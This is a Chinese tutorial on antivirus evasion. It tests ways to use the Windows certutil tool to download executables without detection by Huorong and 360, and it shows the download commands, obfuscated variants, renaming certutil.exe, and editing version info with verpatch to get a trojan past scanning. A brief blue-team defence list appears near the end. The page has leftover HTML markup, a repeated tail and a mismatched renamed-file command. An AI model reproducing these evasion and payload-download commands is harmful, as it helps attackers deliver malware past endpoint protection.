免杀学习-从指令绕过开始(2)：certutil指令绕过技术详解<\/h1>

1. certutil指令基础分析<\/h2>

certutil是Windows系统自带的一个证书管理工具，常被攻击者用于下载恶意文件。其常用参数如下：<\/p>

-f<\/code>：覆盖现有文件（有值参数，后跟下载文件URL）<\/li>
-split<\/code>：保存到文件（无值参数，添加后下载到当前路径，否则下载到默认路径）<\/li>
-URLCache<\/code>：显示或删除URL缓存条目（无值参数）<\/li>

-gmt<\/code>：以GMT时间格式显示时间<\/li>
<\/ul>
重要特性<\/strong>：<\/p>

certutil下载会留下缓存记录<\/li>
缓存查看命令：certutil -urlcache *<\/code><\/li>
缓存删除命令：certutil -urlcache * delete<\/code><\/li>
<\/ul>
2. 安全软件检测原理<\/h2>
安全软件（如360、火绒）对certutil的检测主要基于：<\/p>

敏感指令字符串检测（如"certutil"）<\/li>
下载可执行文件的行为分析<\/li>
命令执行行为分析<\/li>
<\/ol>
3. 绕过火绒的尝试与方法<\/h2>
3.1 语句顺序混淆（失败）<\/h3>
尝试调换带横线参数顺序：<\/p>
certutil -urlcache -gmt -split -f http:\/\/example.com\/file.exe output.exe
<\/span><\/span><\/code><\/pre>结果：无论怎么调换顺序，仍被检测<\/p>
3.2 添加干扰参数（失败）<\/h3>
添加无关参数：<\/p>
certutil -a -urlcache -gmt -split -f http:\/\/example.com\/file.exe output.exe
<\/span><\/span><\/code><\/pre>结果：仍被检测<\/p>
3.3 命令构造绕过（失败）<\/h3>
尝试使用特殊字符构造：<\/p>
^c<\/span>""<\/span>^e^r^t<\/span>""<\/span>u^t<\/span>i^l<\/span> -u^r<\/span>"l""""cache -gmt -split -f ht""tp:\/\/example.com\/file.exe output.^e^""x""^e<\/span>
<\/span><\/span><\/code><\/pre>结果：仍被检测<\/p>
3.4 路径\/文件名替换（成功）<\/h3>
有效方法：<\/p>

复制certutil到其他位置并重命名：<\/li>
<\/ol>
copy<\/span> c:\windows\system32\certutil.exe c.exe
<\/span><\/span><\/code><\/pre>
使用新名称执行：<\/li>
<\/ol>
a -urlcache -split -f http:\/\/example.com\/file.exe output.exe
<\/span><\/span><\/code><\/pre>结果：成功绕过火绒检测<\/p>
4. 绕过360的尝试与方法<\/h2>
4.1 多次路径切换（失败）<\/h3>
将复制的a.exe再次复制为b.exe执行：

结果：仍被检测<\/p>
4.2 动态绕过（部分成功）<\/h3>
使用verpatch工具修改程序版本信息：<\/p>

修改InternalName字段为空：<\/li>
<\/ol>
verpatch.exe zzz.exe \/s InternalName ""<\/span>
<\/span><\/span><\/code><\/pre>
尝试执行：

结果：下载时绕过，但执行木马时仍被报警<\/li>
<\/ol>
4.3 文件类型伪装（失败）<\/h3>
尝试以jpg文件下载后执行：

结果：仍被检测<\/p>
5. 关键结论<\/h2>

最有效方法<\/strong>：复制并重命名certutil.exe<\/li>
360的检测比火绒更为严格，行为分析更全面<\/li>
单纯命令混淆难以绕过现代安全软件<\/li>
动态修改可执行文件属性可能部分有效<\/li>
<\/ol>
6. 防御建议（蓝队视角）<\/h2>

监控system32目录下certutil.exe的复制行为<\/li>
检测非常规位置的certutil执行<\/li>
分析命令执行上下文而不仅是命令本身<\/li>
监控URL缓存操作行为<\/li>
<\/ol>
7. 参考文献<\/h2>

FreeBuf相关文章<\/a><\/li>
阿里云先知社区文章<\/a><\/li>
<\/ol>

免杀学习-从指令绕过开始(2)：certutil指令绕过技术详解<\/h1>

3. 绕过火绒的尝试与方法<\/h2>

4. 绕过360的尝试与方法<\/h2>

4.1 多次路径切换（失败）<\/h3> 将复制的a.exe再次复制为b.exe执行： 结果：仍被检测<\/p>

4.3 文件类型伪装（失败）<\/h3> 尝试以jpg文件下载后执行： 结果：仍被检测<\/p>

7. 参考文献<\/h2> FreeBuf相关文章<\/a><\/li> 阿里云先知社区文章<\/a><\/li> <\/ol>

4.1 多次路径切换（失败）<\/h3>
将复制的a.exe再次复制为b.exe执行：
结果：仍被检测<\/p>

4.3 文件类型伪装（失败）<\/h3>
尝试以jpg文件下载后执行：
结果：仍被检测<\/p>

7. 参考文献<\/h2>

FreeBuf相关文章<\/a><\/li>
阿里云先知社区文章<\/a><\/li> <\/ol>